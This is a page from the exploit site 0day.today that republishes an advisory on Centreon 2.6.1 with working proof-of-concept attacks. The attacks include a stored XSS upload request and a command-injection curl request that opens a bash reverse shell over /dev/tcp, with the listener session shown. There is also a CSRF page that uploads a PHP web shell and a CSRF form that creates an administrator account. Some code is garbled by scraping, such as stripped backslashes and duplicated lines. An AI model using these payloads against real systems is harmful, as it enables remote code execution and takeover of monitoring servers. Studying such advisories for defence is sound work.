0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Centreon 2.6.1 - Multiple Vulnerabilities
Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability Vendor: Centreon Product web page: https://www.centreon.com Affected version: 2.6.1 (CES 3.2) Summary: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. Desc: Centreon suffers from a stored XSS vulnerability. Input passed thru the POST parameter 'img_comment' is not sanitized allowing the attacker to execute HTML code into user's browser session on the affected site. Tested on: CentOS 6.6 (Final) Apache/2.2.15 PHP/5.3.3 10.08.2015 -- POST /centreon/main.php?p=50102 HTTP/1.1 Host: localhost.localdomain User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost.localdomain/centreon/main.php?p=50102&o=a Cookie: PHPSESSID=qg580onenijim611sca8or3o32 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993 Content-Length: 1195 -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="directories" upload -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="list_dir" 0 -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="filename"; filename="phpinfo.php" Content-Type: application/octet-stream <? phpinfo(); ?> -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="img_comment" "><script>alert(1);</script> -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="action[action]" 1 -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="submitA" Save -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="img_id" -----------------------------951909060822176775828135993 Content-Disposition: form-data; name="o" a -----------------------------951909060822176775828135993-- Centreon 2.6.1 Command Injection Vulnerability Summary: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. Desc: The POST parameter 'persistant' which serves for making a new service run in the background is not properly sanitised before being used to execute commands. This can be exploited to inject and execute arbitrary shell commands as well as using cross-site request forgery attacks. Desc: The POST parameter 'persistant' which serves for making a new service run in the background is not properly sanitised before being used to execute commands. This can be exploited to inject and execute arbitrary shell commands as well as using cross-site request forgery attacks. 10.08.2015 -- <<<<<< root@zslab:~# curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' --data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' 'http://localhost.localdomain/centreon/main.php?p=20218' >>>>>> root@zslab:~# nc -4 -l -n 6161 -vv -D Connection from 127.0.0.1 port 6161 [tcp/*] accepted bash: no job control in this shell bash-4.1$ id id uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios) bash-4.1$ uname -a;cat /etc/issue uname -a;cat /etc/issue Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Centreon Enterprise Server Kernel r on an m bash-4.1$ pwd pwd /usr/share/centreon/www bash-4.1$ exit exit exit root@zslab:~# Centreon 2.6.1 Unrestricted File Upload Vulnerability Desc: The vulnerability is caused due to the improper verification of uploaded files via the 'filename' POST parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file that will be stored in the '/img/media/' directory. -- <html> <!-- Specified dir is 1337 and filename is shelly.php --> <!-- Ex: http://localhost.localdomain/centreon/img/media/1337/shelly.php?c=id --> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost.localdomain/centreon/main.php?p=50102", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------951909060822176775828135993"); xhr.withCredentials = true; var body = "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="directories"rn" + "rn" + "1337rn" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="list_dir"rn" + "rn" + "0rn" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="filename"; filename="shelly.php"rn" + "Content-Type: application/octet-streamrn" + "rn" + "x3c?phprn" + "echo "x3cprex3e";system($_GET['c']);echo "x3c/prex3e";rn" + "?x3ern" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="img_comment"rn" + "rn" + "peenedrn" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="action[action]"rn" + "rn" + "1rn" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="submitA"rn" + "rn" + "Savern" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="MAX_FILE_SIZE"rn" + "rn" + "2097152rn" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="img_id"rn" + "rn" + "rn" + "-----------------------------951909060822176775828135993rn" + "Content-Disposition: form-data; name="o"rn" + "rn" + "arn" + "-----------------------------951909060822176775828135993--"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> Centreon 2.6.1 CSRF Add Admin Exploit Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. <html> <body> <form action="'http://localhost.localdomain/centreon/main.php?p=60301" method="POST"> <input type="hidden" name="contact_alias" value="Testingus" /> <input type="hidden" name="contact_name" value="Fullio" /> <input type="hidden" name="contact_email" value="test@test.tld" /> <input type="hidden" name="contact_pager" value="" /> <input type="hidden" name="contact_template_id" value="" /> <input type="hidden" name="contact_enable_notifications[contact_enable_notifications]" value="2" /> <input type="hidden" name="timeperiod_tp_id" value="" /> <input type="hidden" name="timeperiod_tp_id2" value="" /> <input type="hidden" name="contact_oreon[contact_oreon]" value="1" /> <input type="hidden" name="contact_passwd" value="123123" /> <input type="hidden" name="contact_passwd2" value="123123" /> <input type="hidden" name="contact_lang" value="en_US" /> <input type="hidden" name="contact_admin[contact_admin]" value="1" /> <input type="hidden" name="contact_autologin_key" value="" /> <input type="hidden" name="contact_auth_type" value="local" /> <input type="hidden" name="contact_acl_groups[]" value="31" /> <input type="hidden" name="contact_acl_groups[]" value="32" /> <input type="hidden" name="contact_acl_groups[]" value="34" /> <input type="hidden" name="contact_address1" value="Neverland" /> <input type="hidden" name="contact_address2" value="" /> <input type="hidden" name="contact_address3" value="101" /> <input type="hidden" name="contact_address4" value="" /> <input type="hidden" name="contact_address5" value="" /> <input type="hidden" name="contact_address6" value="" /> <input type="hidden" name="contact_activate[contact_activate]" value="1" /> <input type="hidden" name="contact_comment" value="comment-vuln-xss-t00t" /> <input type="hidden" name="action[action]" value="1" /> <input type="hidden" name="submitA" value="Save" /> <input type="hidden" name="contact_register" value="1" /> <input type="hidden" name="contact_id" value="" /> <input type="hidden" name="o" value="a" /> <input type="hidden" name="initialValues" value="a:0:{}" /> <input type="submit" value="Submit request" /> </form> </body> </html> # 0day.today [2024-11-16] #